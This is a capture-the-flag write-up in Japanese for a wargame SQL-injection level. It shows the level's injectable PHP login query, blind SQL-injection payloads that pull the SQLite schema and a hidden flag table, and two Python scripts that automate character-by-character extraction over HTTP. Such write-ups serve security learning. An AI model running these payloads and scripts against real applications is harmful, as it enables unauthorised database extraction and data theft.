<?php include "./config.php"; login_chk(); $db = sqlite_open("./db/poltergeist.db"); $query = "select id from member where id='admin' and pw='{$_GET[pw]}'"; echo "<hr>query : <strong>{$query}</strong><hr><br>"; $result = sqlite_fetch_array(sqlite_query($db,$query)); if($result['id']) echo "<h2>Hello {$result['id']}</h2>"; if($poltergeistFlag === $_GET['pw']) solve("poltergeist");// Flag is in `flag_{$hash}` table, not in `member` table. Let's look over whole of the database. highlight_file(__FILE__);
特徴は以下。
- SQLite
- pwが入力可能
- flag_{$hash}というテーブルがあるので、その中身に書いてあるフラグを取ってくる
Blind SQL Injectionしよう
Blind SQL Injectionでテーブル情報を抜き出す
SELECT group_concat(sql) FROM sqlite_master
でテーブル情報が全部抜き出せるので、
全部抜き出してくる。
以下でテーブル情報の長さを抜き取る。
' or {md} <= length((SELECT group_concat(sql) FROM sqlite_master)) --
以下でテーブル情報の中身を抜き取る。
' or id='admin' and {md} <= unicode(substr((SELECT group_concat(sql) FROM sqlite_master),{i+1},1)) --
import requests url = "https://los.rubiya.kr/chall/poltergeist_a62.php" cookie = {'PHPSESSID': 'f7efq5'} def check(data) -> bool: return ("Hello admin" in data) or ("Hello guest" in data) or ("login success!" in data) ok = 0 ng = 120 while ok + 1 != ng: md = (ok + ng) // 2 q = f"' or {md} <= length((SELECT group_concat(sql) FROM sqlite_master)) --" res = requests.get(url, params={'pw': q}, cookies=cookie) print(f"[+] try {md}") if check(res.text): ok = md else: ng = md length = ok print(f"[*] length = {length}") ans = "" for i in range(0, length): ok = 0 ng = 256 while ok + 1 != ng: md = (ok + ng) // 2 q = f"' or id='admin' and {md} <= unicode(substr((SELECT group_concat(sql) FROM sqlite_master),{i+1},1)) --" res = requests.get(url, params={'pw': q}, cookies=cookie) print(f"[+] try {md}") if check(res.text): ok = md else: ng = md ans += str(chr(ok)) print(f"[*] {ans}") print(f"[*] find! {ans}")
すると
CREATE TABLE "member" ( `id` TEXT, `pw` TEXT ),CREATE TABLE `flag_70c81d99` ( `flag_0876285c` TEXT )
こんな感じに出てくるので、このテーブルの中身を改めて抜き出す。
Blind SQL Injectionでテーブルの中身を抜き出す
SELECT group_concat(flag_0876285c) FROM flag_70c81d99
で抜き出してこよう。
以下で長さを抜き取る。
' or {md} <= length((SELECT group_concat(flag_0876285c) FROM flag_70c81d99)) --
以下で中身を抜き取る。
' or id='admin' and {md} <= unicode(substr((SELECT group_concat(flag_0876285c) FROM flag_70c81d99),{i+1},1)) --
import requests url = "https://los.rubiya.kr/chall/poltergeist_a6d.php" cookie = {'PHPSESSID': 'hn7efq5'} def check(data) -> bool: return ("Hello admin" in data) or ("Hello guest" in data) or ("login success!" in data) ok = 0 ng = 120 while ok + 1 != ng: md = (ok + ng) // 2 q = f"' or {md} <= length((SELECT group_concat(flag_0876285c) FROM flag_70c81d99)) --" res = requests.get(url, params={'pw': q}, cookies=cookie) print(f"[+] try {md}") if check(res.text): ok = md else: ng = md length = ok print(f"[*] length = {length}") ans = "" for i in range(0, length): ok = 0 ng = 256 while ok + 1 != ng: md = (ok + ng) // 2 q = f"' or id='admin' and {md} <= unicode(substr((SELECT group_concat(flag_0876285c) FROM flag_70c81d99),{i+1},1)) --" res = requests.get(url, params={'pw': q}, cookies=cookie) print(f"[+] try {md}") if check(res.text): ok = md else: ng = md ans += str(chr(ok)) print(f"[*] {ans}") print(f"[*] find! {ans}")